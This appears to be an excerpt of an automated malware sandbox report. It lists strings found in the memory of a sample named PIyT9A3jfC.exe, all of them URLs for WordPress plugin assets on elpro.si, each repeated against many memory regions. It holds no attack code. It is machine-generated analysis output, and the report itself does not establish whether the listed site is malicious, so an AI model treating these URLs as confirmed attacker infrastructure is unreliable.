                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=2.3.9
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/custom.js?ver=1.6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/imagesloaded.pkgd
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/jquery.qtip.js?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub
